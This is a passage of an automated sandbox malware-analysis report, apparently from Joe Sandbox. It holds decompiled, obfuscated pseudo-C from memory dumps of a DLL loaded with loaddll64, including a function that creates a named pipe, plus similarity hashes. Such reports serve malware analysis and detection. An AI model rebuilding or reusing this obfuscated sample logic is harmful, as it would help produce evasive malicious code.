                                				if (r13d == 0) goto 0x640c3ed7;
                                				goto 0x640c3dd2;
                                				E00000201201640C908C(0xc06f8334, _t123,  *((intOrPtr*)(_t154 + 0x18)));
                                				if (_t123 == 0) goto 0x640c3ed2;
                                				 *_t123();
                                				goto 0x640c3ed7;
                                				_t124 = _a40;
                                				 *_t124 = r12d;
                                				E00000201201640C908C(0xff709000, _t124,  *((intOrPtr*)(_t154 + 0x20)));
                                				if (_t124 == 0) goto 0x640c3efc;
                                				 *_t124();
                                				E00000201201640C908C(0xbaca8f4d, _t124,  *((intOrPtr*)(_t154 + 0x20)));
                                				if (_t124 == 0) goto 0x640c3f38;
                                				 *_t124();
                                				goto 0x640c3f38;
                                				E00000201201640C908C(0xc06f8334, _t124,  *((intOrPtr*)(_t154 + 0x18)));
                                				if (_t124 == 0) goto 0x640c3f33;
                                				 *_t124();
                                				goto 0x640c3f38;
                                				return 0x7f;
                                			}




















                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: ErrorLast
                                • String ID: $@
                                • API String ID: 1452528299-1077428164
                                • Opcode ID: 7c51c71e63158f765adb5c91cb5b66e3a07b5bc89c7899e7a300cc364f0e630c
                                • Instruction ID: f832a67ab4802aee488280d268a2847a55a2ee95c658bd11840768c19720cbc0
                                • Opcode Fuzzy Hash: 7c51c71e63158f765adb5c91cb5b66e3a07b5bc89c7899e7a300cc364f0e630c
                                • Instruction Fuzzy Hash: A761B232324761C7EB60DB61A84679A67A5FBCC784F140415BF4D83B9EDF3AC8258B08
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 75%
                                			E00007FFC7FFC130E76E0(short __edx, void* __rcx, long long __r8, signed int* __r9) {
                                				void* __rbx;
                                				void* __rdi;
                                				signed int _t369;
                                				signed int _t389;
                                				signed int _t393;
                                				signed int _t412;
                                				signed int _t423;
                                				intOrPtr _t426;
                                				intOrPtr _t433;
                                				long long _t439;
                                				signed int _t464;
                                				signed int _t502;
                                				signed int _t503;
                                				signed int _t512;
                                				signed long long _t515;
                                				signed int _t530;
                                				signed char _t533;
                                				signed int _t539;
                                				void* _t579;
                                				long long _t592;
                                				intOrPtr _t593;
                                				signed long long _t595;
                                				signed long long _t596;
                                				signed long long _t597;
                                				signed short _t599;
                                				signed long long _t600;
                                				signed long long _t603;
                                				signed long long _t604;
                                				intOrPtr _t606;
                                				intOrPtr _t609;
                                				signed long long _t610;
                                				signed long long _t611;
                                				intOrPtr _t612;
                                				signed long long _t613;
                                				intOrPtr _t618;
                                				intOrPtr _t620;
                                				signed long long _t622;
                                				intOrPtr _t623;
                                				signed long long _t626;
                                				intOrPtr _t627;
                                				intOrPtr _t629;
                                				signed long long _t630;
                                				signed long long _t631;
                                				intOrPtr _t637;
                                				signed int* _t638;
                                				intOrPtr _t640;
                                				signed long long _t650;
                                				signed long long _t652;
                                				signed long long _t658;
                                				signed long long _t664;
                                				intOrPtr _t675;
                                				intOrPtr _t684;
                                				signed long long _t687;
                                				signed long long _t688;
                                				signed long long _t690;
                                				signed long long _t691;
                                				signed long long _t693;
                                				void* _t695;
                                				signed int* _t696;
                                				signed int* _t697;
                                				void* _t699;
                                				signed long long _t702;
                                				signed int* _t706;
                                				void* _t710;
                                				void* _t711;
                                				signed long long _t716;
                                				signed long long _t717;
                                				intOrPtr _t719;
                                				intOrPtr _t720;
                                				long long _t723;
                                				signed char _t725;
                                				signed long long _t726;
                                				long long _t734;
                                				signed long long _t735;
                                				signed long long _t742;
                                				intOrPtr _t743;
                                				long long _t745;
                                				void* _t746;
                                				signed long long _t747;
                                				signed long long _t748;
                                				signed long long _t749;
                                				void* _t751;
                                				void* _t754;
                                				intOrPtr _t755;
                                				intOrPtr _t756;
                                				signed long long _t757;
                                				void* _t760;
                                				signed long long _t761;
                                				signed long long _t762;
                                				signed long long _t763;
                                				signed long long _t765;
                                
                                				 *((long long*)(_t710 + 0x18)) = __r8;
                                				 *((short*)(_t710 + 0x10)) = __edx;
                                				_t711 = _t710 - 0xa8;
                                				_t755 =  *((intOrPtr*)(_t711 + 0x110));
                                				r8d =  *0x13124130 & 0x0000ffff;
                                				_t761 =  *(_t711 + 0x130);
                                				 *(_t711 + 0x108) =  *0x13124158 & 0x000000ff;
                                				_t592 =  *0x13124178; // 0x0
                                				 *((long long*)(_t711 + 0x68)) = _t592;
                                				 *((long long*)(_t711 + 0x88)) = _t592;
                                				_t369 =  *0x13124148; // 0x0
                                				r9d =  *0x13124134; // 0x0
                                				 *(_t711 + 0xf0) =  *(_t755 + (_t369 + _t369) * 4) & 0x000000ff;
                                				r9d = r9d + 1;
                                				_t593 =  *0x13124128; // 0x0
                                				 *(_t711 + 0x60) = r9d;
                                				_t747 =  *((intOrPtr*)(_t593 + 0x6f80));
                                				 *0x13124134 = r9d;
                                				 *0x13124133 =  *0x13124133 + 1;
                                				_t696 =  *((intOrPtr*)(_t755 + 0x7148)) - 0x1a89;
                                				 *(_t711 + 0x90) = _t696;
                                				_t595 =  *0x13124124;
                                				_t742 = _t696[_t761] &  *0x533d & _t595;
                                				 *(_t711 + 0x70) = _t742;
                                				asm("cdq");
                                				 *(0x32c + ( *_t696 +  *_t696) * 4) = 0x111b /  *(0x32c + ( *_t696 +  *_t696) * 4);
                                				_t723 = _t747 * 8;
                                				 *(_t711 + 0x80) = _t595;
                                				 *((long long*)(_t711 + 0x78)) = _t723;
                                				 *(__rcx + _t595 * 4) = r11d;
                                				_t684 =  *0x13124178; // 0x0
                                				 *(_t684 + _t723) = ( *(_t684 + _t723) & 0x0000ffff) * ( *0x13124123 & 0x000000ff);
                                				_t596 =  *0x13124128; // 0x0
                                				 *0x13124180 = _t596;
                                				_t685 =  *_t696;
                                				_t41 = _t685 + 1; // 0x1
                                				 *_t696 = _t41;
                                				_t530 =  *0x1312414c; // 0x0
                                				_t44 = _t685 + 0x1b; // 0x1b
                                				r11d =  *(_t596 + _t596 * 2 + 0x3996) & 0x000000ff;
                                				_t597 =  *0x13124138; // 0x0
                                				_t734 =  *((intOrPtr*)(_t597 + _t44 * 8));
                                				 *0x1312414c = _t530 + 1;
                                				 *((long long*)(_t711 + 0x58)) =  *(__r8 + 0xab0) * 0x1a29;
                                				 *(_t711 + 0x50) = 0x172d;
                                				 *((long long*)(_t711 + 0x48)) = _t734;
                                				 *(_t711 + 0x40) = 0x913;
                                				r8d = 0x172d;
                                				 *(_t711 + 0x38) = _t742;
                                				 *((long long*)(_t711 + 0x30)) = 0x641;
                                				 *(_t711 + 0x28) = 0x1d5d;
                                				 *(_t711 + 0x20) =  *(0x32c + _t747 * 4) * ( *0x13124133 & 0x000000ff);
                                				_t389 = E00007FFC7FFC130FCB60( *(0x32c + _t747 * 4) * ( *0x13124133 & 0x000000ff),  *(__r8 + 0xab0) * 0x1a29,  *_t696, __r8,  *((intOrPtr*)(__r8 +  *_t696 * 4)));
                                				_t743 =  *((intOrPtr*)(_t711 + 0x100));
                                				__r9[_t597] = _t389;
                                				_t533 =  *0x13124158; // 0x0
                                				_t393 =  *0x13124148; // 0x0
                                				 *(_t711 + 0x130) = _t533;
                                				_t650 = _t393 + 4;
                                				 *((intOrPtr*)(_t743 + _t650 * 4)) = r15d;
                                				r9d =  *0x13124168; // 0x0
                                				r8d =  *0x13124148; // 0x0
                                				r9d = r9d + _t533;
                                				r8d = r8d - 1;
                                				 *0x13124148 = r8d;
                                				 *0x13124168 = r9d;
                                				if ( *((intOrPtr*)(_t743 + _t650 * 8)) - ( *(_t747 +  *((intOrPtr*)(_t711 + 0x120))) & 0x000000ff) < 0) goto 0x130e808e;
                                				_t687 =  *0x131241a0; // 0x0
                                				if ( *((intOrPtr*)(__rcx + _t687 * 4)) - r8d < 0) goto 0x130e8000;
                                				r10d = 0x1e56;
                                				 *((long long*)(_t711 + 0x100)) = _t734;
                                				if ( *((intOrPtr*)(__rcx + r8d * 4)) - _t734 < 0) goto 0x130e7ffd;
                                				_t599 =  *0x13124170; // 0x0
                                				_t725 =  *0x13124158; // 0x0
                                				_t600 = _t599 + 1;
                                				 *0x13124170 = _t600;
                                				if (_t725 - _t600 <= 0) goto 0x130e7ff3;
                                				_t652 = _t600 + _t600 * 2;
                                				if (__r9[_t652] ==  *((intOrPtr*)(__rcx + 0x90 + _t761 * 4))) goto 0x130e7af2;
                                				if ( *((intOrPtr*)(__rcx +  *(_t711 + 0x70) * 4)) - 0x11b0 <= 0) goto 0x130e7af2;
                                				_t688 = _t687 - 1;
                                				 *0x131241a0 = _t688;
                                				if (_t725 - _t652 > 0) goto 0x130e7a41;
                                				_t603 =  *((intOrPtr*)(_t711 + 0x118));
                                				if (0x672 -  *((intOrPtr*)(_t603 + 0x3d74)) < 0) goto 0x130e7a41;
                                				 *(_t755 + _t761 * 8) =  *(_t755 + _t761 * 8) ^ 0x00000507;
                                				 *0x13124133 = ( *0x13124133 & 0x000000ff) * (( *(_t696 + _t761 * 8 - 8) & 0x000000ff) +  *((intOrPtr*)( *((intOrPtr*)(_t711 + 0x120)) + 0xddb)) & 0x000000ff);
                                				goto 0x130e819f;
                                				_t726 =  *((intOrPtr*)(_t711 + 0x88));
                                				_t762 = _t761 - 1;
                                				r10d =  *(_t711 + 0xf8) & 0x0000ffff;
                                				_t604 = _t688;
                                				__r9[0x20 + _t603 * 4] = _t603 /  *(_t726 +  *__r9 * 8) % __r9[0x20 + _t603 * 4];
                                				 *((intOrPtr*)(0x32c +  *__r9 * 4)) =  *((intOrPtr*)(0x32c +  *__r9 * 4)) + ( *0x13124190 & 0x0000ffff);
                                				_t412 =  *0x13124134; // 0x0
                                				 *0x13124130 =  *0x13124130 | ( *0x13124123 & 0x000000ff) - 0x00000001;
                                				 *(_t755 + _t747 * 4) =  *(_t755 + _t747 * 4) ^ _t412 -  *0x13124180;
                                				_t748 = _t747 + 1;
                                				 *0x13124150 = _t604;
                                				_t658 = _t604 * 4;
                                				 *((intOrPtr*)(__rcx + 0x7574)) =  *((intOrPtr*)(__rcx + 0x7574)) +  *((intOrPtr*)(_t726 + _t658 * 8));
                                				goto 0x130e7f04;
                                				_t706 =  *((intOrPtr*)(_t711 + 0x118));
                                				_t637 =  *((intOrPtr*)(_t711 + 0x68));
                                				asm("cdq");
                                				 *0x13124148 = (_t706[0x877] & 0x0000ffff) % r8d;
                                				 *(_t637 +  *__r9 * 8) = _t658 ^  *(_t637 +  *__r9 * 8) ^ 0x00001fe9;
                                				_t606 =  *0x13124140; // 0x0
                                				 *((intOrPtr*)(_t606 + (_t762 + _t762) * 8)) = 0x109d;
                                				_t502 =  *0x1312414c; // 0x0
                                				_t539 =  *0x13124122 & 0x000000ff;
                                				_t503 = _t502 ^ 0x00001dd4;
                                				 *0x1312414c = _t503;
                                				if (_t539 - 0xb51 >= 0) goto 0x130e7a39;
                                				if ( *((intOrPtr*)(_t743 + (_t762 + 1 + _t762 + 1) * 8)) - 0x689 >= 0) goto 0x130e7a39;
                                				_t579 = _t539 -  *0x13124123; // 0x0
                                				if (_t579 == 0) goto 0x130e7a39;
                                				if ( *((long long*)(_t637 + 8 + _t762 * 8)) - 0x19b8 >= 0) goto 0x130e7a39;
                                				r8d =  *(_t711 + 0x60);
                                				r9d = r8b & 0xffffffff;
                                				if (r9d !=  *(_t711 + 0x130)) goto 0x130e7df1;
                                				if (( *(_t711 + 0x108) & 0x000000ff) - 0x1825 <= 0) goto 0x130e7df1;
                                				if ( *0x13124194 - 0x23a < 0) goto 0x130e7df1;
                                				_t609 =  *0x13124128; // 0x0
                                				r8b = r8b - 1;
                                				_t735 =  *(_t711 + 0x80);
                                				_t756 =  *((intOrPtr*)(_t711 + 0x128));
                                				 *((long long*)(_t711 + 0x58)) = 0x321;
                                				r8d = r8b & 0xffffffff;
                                				 *((intOrPtr*)(__rcx + (_t735 + _t735 * 2) * 4)) =  *((intOrPtr*)(_t609 + _t503 * 4));
                                				_t610 =  *0x13124188; // 0x0
                                				_t664 =  *0x13124178; // 0x0
                                				_t638 =  *((intOrPtr*)(_t610 + 0x2a1c));
                                				r9d =  *(_t756 + _t610 * 2) & 0x0000ffff;
                                				_t611 =  *0x131241a0; // 0x0
                                				_t423 =  *0x1312414c; // 0x0
                                				asm("cdq");
                                				 *(_t711 + 0x50) = _t611;
                                				 *((long long*)(_t711 + 0x48)) = 0x1400;
                                				 *(_t711 + 0x40) = 0xf51;
                                				 *(_t711 + 0x38) = _t664;
                                				 *((long long*)(_t711 + 0x30)) = _t423 % r8d;
                                				 *(_t711 + 0x28) = 0x180d40a;
                                				 *(_t711 + 0x20) = _t706;
                                				_t426 = E00007FFC7FFC130FCB60(_t638, _t664, _t735 + _t735 * 2, _t638, _t726 & _t664);
                                				r9d = 0x7c;
                                				 *((intOrPtr*)(__rcx + _t611 * 4)) = _t426;
                                				_t716 =  *0x13124180; // 0x0
                                				r9b = r9b -  *0x13124133;
                                				_t717 = _t716 + 1;
                                				 *0x13124132 = 0x125b % ( *0x13124132 & 0x000000ff);
                                				_t690 =  *0x13124170; // 0x0
                                				 *0x13124180 = _t717;
                                				_t691 = _t690 ^ 0x00000d0b;
                                				 *0x13124148 = 0x1a17;
                                				 *0x13124133 = r9b;
                                				_t612 =  *0x13124128; // 0x0
                                				_t613 =  *0x13124168;
                                				_t702 =  *( *((intOrPtr*)(_t711 + 0x78)) + _t612) ^ _t613;
                                				_t433 =  *0x13124194; // 0x0
                                				_t697 = _t433 -  *(_t711 + 0x130) + 2;
                                				 *_t613 =  *_t613 + 1;
                                				r8d =  *_t613;
                                				r10d =  *0x13124170 & 0x0000ffff;
                                				_t196 = _t717 + 3; // 0x4
                                				_t745 = ( *(_t711 + 0x90))[_t196];
                                				r8d = 0xaf4;
                                				 *(_t711 + 0x40) =  *( *((intOrPtr*)(_t711 + 0x68)) + (_t717 + _t717 * 2) * 8) *  *(_t711 + 0x70);
                                				 *(_t711 + 0x38) = r10w;
                                				 *((long long*)(_t711 + 0x30)) = _t745;
                                				 *(_t711 + 0x28) = _t638;
                                				 *(_t711 + 0x20) = _t697;
                                				_t439 = E00007FFC7FFC130E36A0(_t638,  *(__r9 + 8 + _t611 * 4) |  *0x131241a0, _t691, _t697, _t717 + _t717 * 2, _t735, _t760, _t754, _t751);
                                				r10d =  *(_t711 + 0xf8) & 0x0000ffff;
                                				_t618 =  *0x13124138; // 0x0
                                				 *((long long*)(_t618 + 0x30 + _t735 * 8)) = _t439;
                                				 *0x13124122 = 0x22;
                                				 *((short*)(_t756 + 8 + _t762 * 8)) =  *0x13124133 & 0x000000ff;
                                				_t763 = _t762 + 2;
                                				_t757 =  *((intOrPtr*)(_t711 + 0x110));
                                				goto 0x130e7f04;
                                				if ( *((intOrPtr*)( *((intOrPtr*)(_t711 + 0x78)) + _t745)) - ( *(_t711 + 0xf8) & 0x0000ffff) >= 0) goto 0x130e7f58;
                                				asm("cdq");
                                				 *((_t748 + 1 << 4) + 0xb65) = 0x1d5d %  *((_t748 + 1 << 4) + 0xb65);
                                				 *(_t757 + 0x4e00) =  *(_t757 + 0x4e00) &  *0x1312416c & 0x0000ffff;
                                				_t719 =  *0x13124160; // 0x0
                                				asm("cdq");
                                				 *(_t719 + _t763) = 0xfffffcfa / ( *(_t719 + _t763) & 0x000000ff);
                                				_t620 =  *0x13124128; // 0x0
                                				 *0x13124132 = 0x80;
                                				if (r9d -  *((intOrPtr*)(_t620 +  *_t697 * 4)) >= 0) goto 0x130e7ef3;
                                				 *(_t702 + 4 + _t763 * 4) =  *(_t702 + 4 + _t763 * 4) & r9d;
                                				_t512 =  *(_t757 + 0x13800);
                                				if (_t512 - ( *0x13124130 & 0x0000ffff) > 0) goto 0x130e7edc;
                                				r11d = bpl & 0xffffffff;
                                				r11d = r11d - r9d;
                                				 *(0x32c + _t702 * 4) =  *(0x32c + _t702 * 4) * r9d;
                                				asm("cdq");
                                				r8d = r11d / _t512;
                                				_t622 =  *0x131241a0; // 0x0
                                				 *(_t702 + 8 + _t622 * 4) = r8d;
                                				if (_t512 + 1 - ( *0x13124130 & 0x0000ffff) <= 0) goto 0x130e7eb0;
                                				r9d = r9d + 1;
                                				_t623 =  *0x13124128; // 0x0
                                				if (r9d -  *((intOrPtr*)(_t623 +  *_t697 * 4)) < 0) goto 0x130e7e80;
                                				_t640 =  *((intOrPtr*)(_t711 + 0x100));
                                				r10d =  *(_t711 + 0xf8) & 0x0000ffff;
                                				_t720 =  *0x13124138; // 0x0
                                				_t765 = _t763 - 1 << 5;
                                				 *(_t720 + _t765) =  *(_t720 + _t765) & _t691;
                                				_t515 =  *0x13124150; // 0x0
                                				 *((intOrPtr*)(_t757 + (_t748 + _t748 * 2) * 4)) = _t515 -  *((intOrPtr*)(_t757 + (_t748 + _t748 * 2) * 4));
                                				_t675 =  *0x13124138; // 0x0
                                				 *(_t675 + 0x98 + _t748 * 8) =  *(_t675 + 0x98 + _t748 * 8) | 0x00001d60;
                                				goto 0x130e819f;
                                				r8b = r8b - 1;
                                				_t626 =  *0x13124148;
                                				 *(__rcx + _t626 * 4) =  *((intOrPtr*)(0x32c +  *0x13124124 * 4)) - 0x000002a3 & r10d;
                                				_t693 = ( *0x452a & 0x000000ff) - (0x909243fb * ( *0x452a & 0x000000ff) >> 0x20 >> 0xc) * 0x1c55;
                                				 *(_t745 + 0x4e10) =  *(_t640 + 0x2e78) *  *0x2a0c;
                                				 *(_t640 + _t626 * 8) =  *(_t640 + _t626 * 8) & _t626;
                                				_t464 =  *0x13124148; // 0x0
                                				 *((intOrPtr*)(_t745 + (_t464 + 0xc) * 4)) =  *((intOrPtr*)(_t745 + (_t464 + 0xc) * 4)) + ( *(_t711 + 0xf0) & 0x000000ff);
                                				 *((intOrPtr*)(_t745 + 0x4e1c)) =  *((intOrPtr*)(_t745 + 0x4e1c)) + 0x1bcb;
                                				goto 0x130e819f;
                                				goto 0x130e8000;
                                				 *(__rcx + 0x19cc) =  *(__rcx + 0x19cc) * 0x81c;
                                				r8d =  *0x13124190 & 0x0000ffff;
                                				_t749 = _t693;
                                				if (r8d - ( *(_t711 + 0xf0) & 0x000000ff) <= 0) goto 0x130e7efb;
                                				_t627 =  *0x13124128; // 0x0
                                				 *0x13124132 = r8b;
                                				r8d = r8d + 1;
                                				if (r8d - ((bpl & 0xffffffff) +  *((intOrPtr*)(_t627 + (_t693 + _t693 * 2) * 4 + 0x1c)) & 0x000000ff) > 0) goto 0x130e8070;
                                				goto 0x130e7efb;
                                				r14d =  *0x13124132 & 0x000000ff;
                                				_t629 =  *0x13124188; // 0x0
                                				r15d = 0x1e57;
                                				_t630 =  *0x13124170; // 0x0
                                				r11d =  *(0xb65 + _t630 * 4) & 0x0000ffff;
                                				_t631 = r8d;
                                				r8d =  *0x3c9d & 0x000000ff;
                                				r9d =  *(0xb65 + _t631 * 4);
                                				r9d = r9d + r8d;
                                				r8d =  *(_t711 + 0xf0) & 0x000000ff;
                                				r8d = 0x5a2058;
                                				 *(_t711 + 0x40) = r9d;
                                				 *(_t711 + 0x38) = r11w;
                                				 *((long long*)(_t711 + 0x30)) =  *((intOrPtr*)(_t629 + 8 + (_t765 + _t765) * 8));
                                				 *(_t711 + 0x28) = _t697;
                                				 *(_t711 + 0x20) = _t697[ *(_t711 + 0x80)] - ( *(_t711 + 0x60) & 0x000000ff);
                                				 *0x13124148 = E00007FFC7FFC130E36A0( *((intOrPtr*)(_t629 + 8 + (_t765 + _t765) * 8)), _t757 | 0x00001b57, _t627 + (_t693 + _t693 * 2) * 4, _t697, _t720, r9d, _t746, _t695, _t699);
                                				 *((intOrPtr*)( *((intOrPtr*)(_t711 + 0x68)) + (_t749 + 0xe + _t749 + 0xe) * 8)) =  *((intOrPtr*)( *((intOrPtr*)(_t711 + 0x68)) + (_t749 + 0xe + _t749 + 0xe) * 8)) + _t631;
                                				 *(__rcx + 0x19e0) =  *(__rcx + 0x19e0) |  *((intOrPtr*)( *((intOrPtr*)(_t711 + 0x88)) + 0xaa10)) + 0x0000161d;
                                				 *((short*)( *((intOrPtr*)(_t711 + 0x128)) + 0x34 + _t749 * 2)) = ( *(_t711 + 0x90))[0x13d7] & 0x0000ffff;
                                				return r15d;
                                			}

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID: X Z
                                • API String ID: 0-2211723858
                                • Opcode ID: 827fdf0af26fc57b60e32c1447e2fb47698a2641ae8370e9671a321f5b191396
                                • Instruction ID: d248b34bfa69909ae8380e5e03fecf0cecbf1d369ffee55f868a6fa9b7f6e9fb
                                • Opcode Fuzzy Hash: 827fdf0af26fc57b60e32c1447e2fb47698a2641ae8370e9671a321f5b191396
                                • Instruction Fuzzy Hash: D152F632608AA986E724CF16F8907B97BB0F758759F254136EA8DA3754DF3CE120CB14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 50%
                                			E00007FFC7FFC130FED60(void* __ecx, signed int __edx, void* __esp, void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, signed int _a8, signed int _a16, long long _a24, signed int _a32, intOrPtr _a48, signed int _a56, signed int _a72, signed int* _a96, signed int _a104) {
                                				long long _v72;
                                				signed int _v80;
                                				signed int _v88;
                                				signed int _v96;
                                				long long _v104;
                                				void* __rdi;
                                				void* __rsi;
                                				signed int _t121;
                                				void* _t125;
                                				signed int _t129;
                                				void* _t158;
                                				signed int _t160;
                                				signed long long _t182;
                                				signed int* _t191;
                                				signed long long _t197;
                                				signed long long _t198;
                                				signed int _t206;
                                				signed int _t209;
                                				void* _t212;
                                				signed long long _t214;
                                				signed long long _t221;
                                				signed long long _t223;
                                				void* _t225;
                                				void* _t227;
                                				void* _t230;
                                				void* _t231;
                                				void* _t232;
                                
                                				_t227 = __r10;
                                				_a32 = r9d;
                                				r9d = _a104;
                                				r14d = __r8 - 0x216;
                                				r8d = _a56;
                                				r15d = __rdx - 0x25a;
                                				_a8 = __rdx - 0x228c;
                                				r10d = __r9 - 0x2f8;
                                				r8d = r8d + 0xde3;
                                				_a32 = r10d;
                                				_t158 = _a48 + 0xffffc81f;
                                				_a72 = r8d;
                                				r13d = __edx;
                                				r12d = __rax - 0x8d0;
                                				_t160 = __rax - 0x278;
                                				_a16 = r12d;
                                				if (_t158 == _t232 + 0x21a) goto 0x130ff139;
                                				_a24 = __rbx;
                                				_t191 = _a96;
                                				if (_t158 - __r9 - 0x4c0 >= 0) goto 0x130feef0;
                                				if (r15d == _t212 - 0xfa) goto 0x130feef0;
                                				r8d =  *(_t191[0x34] + 0x54);
                                				E00007FFC7FFC130EBFF0(__ecx, __rcx - 0x108, _t158, __esp, _t191[0x30], _t191[0x22], _t212, _t214, __r8);
                                				r9d = _t191[0x2e];
                                				r9d = r9d - 0x13eb;
                                				_t125 =  *((intOrPtr*)(_t191[0x72] + 0xb8)) - 0x13eb;
                                				if (_t125 - __r9 > 0) goto 0x130feea1;
                                				_t221 = _t191[0x78] ^ 0x0000329d;
                                				asm("o16 nop [eax+eax]");
                                				if (_t125 + 1 - __r9 <= 0) goto 0x130fee90;
                                				_t191[8] = _t191[8] + _t221;
                                				_t182 = _t191[0x68];
                                				_t206 = _t191[0x10];
                                				r8d = _a72;
                                				r10d = _a32;
                                				_t197 =  *(_t182 + 0x150) ^  *(_t206 + 0x198) ^ 0x00003666;
                                				 *(_t206 + 0x198) = _t197;
                                				_t191[0x12] = _t182 * 0x1f2c;
                                				if (r8d - _t230 + 0x55e >= 0) goto 0x130feff2;
                                				if (0 - _t191[0x3e] >= 0) goto 0x130ff131;
                                				asm("o16 nop [eax+eax]");
                                				_t223 =  *_t191;
                                				r8d = 0x3595;
                                				if (( *(_t223 + 0x130) ^ 0x00001662) == r8d) goto 0x130fef68;
                                				r8d = r8d + 1;
                                				_t191[0x78] = _t191[0x78] - 0x469b;
                                				_t198 = _t197 ^ 0x00001662;
                                				if (r8d != _t198) goto 0x130fef41;
                                				r9d = _t191[0x4c] * 0x550e2718;
                                				_t191[0x78] = _t191[0x78] * 0x3882;
                                				_t209 = _t191[0x42];
                                				_t225 = _t223 * _t214 + _t209;
                                				if (( !(_t198 - 1) &  *((intOrPtr*)(_t209 + 0x10)) - 0x00000001 +  *((intOrPtr*)(_t191[0x34] + 0x3c))) == 0) goto 0x130fefd9;
                                				if ( *((intOrPtr*)(_t225 + 0x14)) == 0) goto 0x130fefd9;
                                				_t129 =  *(_t225 + 0x10);
                                				if (_t129 == 0) goto 0x130fefd9;
                                				r8d = _t129;
                                				E00007FFC7FFC130EBFF0( *((intOrPtr*)(_t225 + 0xc)), 0, 0, __esp, _t198 + _t191[0x30], _t209 + _t191[0x22], _t212, _t214, _t221);
                                				if (1 - (_t191[0x3e] & 0x0000ffff) < 0) goto 0x130fef20;
                                				goto 0x130ff131;
                                				if (_t191[0x70] - 1 >= 0) goto 0x130ff131;
                                				r13d = _a8;
                                				_v72 = _t231 + 0x4ac1 + _t160;
                                				r12d = 0;
                                				_a72 = (_t160 | r13d) + 0xffffdfce;
                                				r12d = r12d & r14d;
                                				r14d = _a72;
                                				r15d = r15d & _t160;
                                				_a104 = _t227 - 0x2103;
                                				r9d = _t191[0x54];
                                				r8d = _t191[0x4c];
                                				r8d = r8d & _t160;
                                				_v96 = r13d - _t191[0x50];
                                				r9d = r9d * _t160;
                                				_v104 = (_t221 + 0x3a59) * r10d;
                                				CreateNamedPipeA(??, ??, ??, ??, ??, ??, ??, ??);
                                				r8d =  *_t191;
                                				r8d = r8d & _t191[0x6c];
                                				_v80 = r12d;
                                				_t191[0x2c] = _t191[0x2c] + _t191[0x70] - _t160 + _t191[0x8c];
                                				_v88 = _t191[0x16] | 0x0000228c;
                                				_v96 = r15d;
                                				_v104 = _t191[0x48] + 0xffffc919 + r13d;
                                				_t121 = E00007FFC7FFC130E8BF0(_a104, r8d & _t191[0x78] ^ 0x0000228c, _t191[0x70] - _t160 + _t191[0x8c], _t191, _t160, _t231 + 0x4ac1 + _t160, _t221, _t191, _t231 + 0x4ac1 + _t160);
                                				r10d = _a32;
                                				r8d = _t121;
                                				if (_t212 - 1 != 0) goto 0x130ff060;
                                				r12d = _a16;
                                				return _t230 - 0x1086;
                                			}

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: CreateNamedPipe
                                • String ID:
                                • API String ID: 2489174969-0
                                • Opcode ID: 676958c7396e2aded2e374393f5bc208b79977bc6edc0e319e61f5911db9d7ab
                                • Instruction ID: 6f7268671bd391bddf865556f143422abb8c40bfad2caa363f12c4782ec1b758
                                • Opcode Fuzzy Hash: 676958c7396e2aded2e374393f5bc208b79977bc6edc0e319e61f5911db9d7ab
                                • Instruction Fuzzy Hash: 3BA19A33608A958AD760CF29E844BED77A5F788B88F04413ACE4D5BB48DB38E955CB10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 87%
                                			E00007FFC7FFC130F1E14(signed int __ecx, long long __rbx, signed char* __rdx, long long __rsi, char* __r9) {
                                				signed int _t47;
                                				signed int _t51;
                                				signed char _t52;
                                				void* _t53;
                                				void* _t59;
                                				void* _t62;
                                				void* _t81;
                                				signed int _t87;
                                				signed int _t88;
                                				void* _t95;
                                				void* _t96;
                                				void* _t99;
                                				void* _t127;
                                				intOrPtr* _t135;
                                				void* _t140;
                                				char* _t149;
                                				long long _t151;
                                				void* _t154;
                                				void* _t155;
                                				void* _t157;
                                				void* _t161;
                                				void* _t165;
                                
                                				_t137 = __rbx;
                                				_t161 = _t154;
                                				 *((long long*)(_t161 + 0x10)) = __rbx;
                                				 *((long long*)(_t161 + 0x18)) = _t151;
                                				 *((long long*)(_t161 + 0x20)) = __rsi;
                                				_push(_t165);
                                				_t155 = _t154 - 0x30;
                                				 *__r9 = 0;
                                				r10d = r10d & 0x0000003f;
                                				_t149 = __r9;
                                				_t87 = r8d;
